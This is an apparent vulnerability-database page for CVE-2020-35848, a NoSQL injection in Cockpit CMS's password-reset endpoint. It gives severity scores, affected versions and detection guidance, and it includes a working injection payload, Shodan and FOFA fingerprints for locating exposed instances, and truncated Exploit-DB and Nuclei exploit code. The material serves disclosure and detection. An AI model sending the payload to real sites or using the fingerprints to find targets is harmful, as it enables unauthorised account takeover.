CVE-2020-35848
published 2020-12-30CVE-2020-35848: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php newpassword function.
PriorityP180critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
74.99%
99.4th percentile
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php newpassword function.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| agentejo | cockpit | < 0.11.2 | 0.11.2 |
Detection & IOCsextracted from sources · hover to see the quote
url/auth/newpassword
command{"token": {"$func": "var_dump"}}
otherhttp.favicon.hash:688609340
- →POST request to /auth/newpassword with a JSON body containing a MongoDB operator key '$func' with value 'var_dump' is the canonical exploit payload for this CVE.
- →Successful exploitation produces a response body matching the regex pattern 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' — a PHP var_dump output of a reset token prefixed with 'rp-'.
- →Shodan fingerprint for Cockpit CMS instances: favicon hash 688609340. Use to identify exposed targets.
- →FOFA fingerprint for Cockpit CMS: icon_hash=688609340 or body contains 'cockpit'.
- →All exploit requests use Content-Type: application/json — inspect POST bodies to /auth/* endpoints for JSON objects containing MongoDB operator keys (e.g., $func, $gt, $ne) as injection indicators. ↗
- ·The nuclei template targets Cockpit versions prior to 0.12.0; NVD lists the patched version as 0.11.2. Ensure detection coverage spans both version boundaries. ↗
- ·The exploit script (exploit-db 50185) covers CVE-2020-35847 (requestreset endpoint) AND CVE-2020-35848 (newpassword endpoint) in a single chain — detections should account for multi-step attack sequences across all three /auth/* endpoints. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection
exploitdb·2021-08-10·CVSS 9.8
CVE-2020-35848 [CRITICAL] Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection
Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection
---
# Exploit Title: Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection
# Date: 06-08-2021
# Exploit Author: Brian Ombongi
# Vendor Homepage: https://getcockpit.com/
# Version: Cockpit 0.11.1
# Tested on: Ubuntu 16.04.7
# CVE : CVE-2020-35847 & CVE-2020-35848
#!/usr/bin/python3
import json
import re
import requests
import random
import string
import argparse
def usage():
guide = 'python3 exploit.py -u '
return guide
def arguments():
parse = argparse.ArgumentParser(usage=usage())
parse.add_argument('-u', dest='url', help='Site URL e.g http://cockpit.local', type=str, required=True)
return parse.parse_args()
def test_connection(url):
try:
get = requests.get(url)
if get.status_code ==
Nuclei
Agentejo Cockpit <0.12.0 - NoSQL Injection
nuclei·CVSS 9.8
CVE-2020-35848 [CRITICAL] Agentejo Cockpit <0.12.0 - NoSQL Injection
Agentejo Cockpit <0.12.0 - NoSQL Injection
Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
Template:
id: CVE-2020-35848
info:
name: Agentejo Cockpit <0.12.0 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
impact: |
Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption.
remediation: |
Upgrade Agentejo Cockpit to version 0.12.0 or
Nuclei
Agentejo Cockpit Security Checks
nuclei·CVSS 9.8
CVE-2020-35846 [CRITICAL] Agentejo Cockpit Security Checks
Agentejo Cockpit Security Checks
A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target.
Template:
id: cockpit-workflow
info:
name: Agentejo Cockpit Security Checks
author: dwisiswant0
description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target.
workflows:
- template: http/technologies/cockpit-detect.yaml
subtemplates:
- template: http/cves/2020/CVE-2020-35846.yaml
- template: http/cves/2020/CVE-2020-35847.yaml
- template: http/cves/2020/CVE-2020-35848.yaml
http://packetstormsecurity.com/files/163762/Cockpit-CMS-0.11.1-NoSQL-Injection.htmlhttps://getcockpit.com/https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59afhttps://github.com/agentejo/cockpit/commit/79fc9631ffa29146e3124ceaf99879b92e1ef24bhttp://packetstormsecurity.com/files/163762/Cockpit-CMS-0.11.1-NoSQL-Injection.htmlhttps://getcockpit.com/https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59afhttps://github.com/agentejo/cockpit/commit/79fc9631ffa29146e3124ceaf99879b92e1ef24b
2020-12-30
Published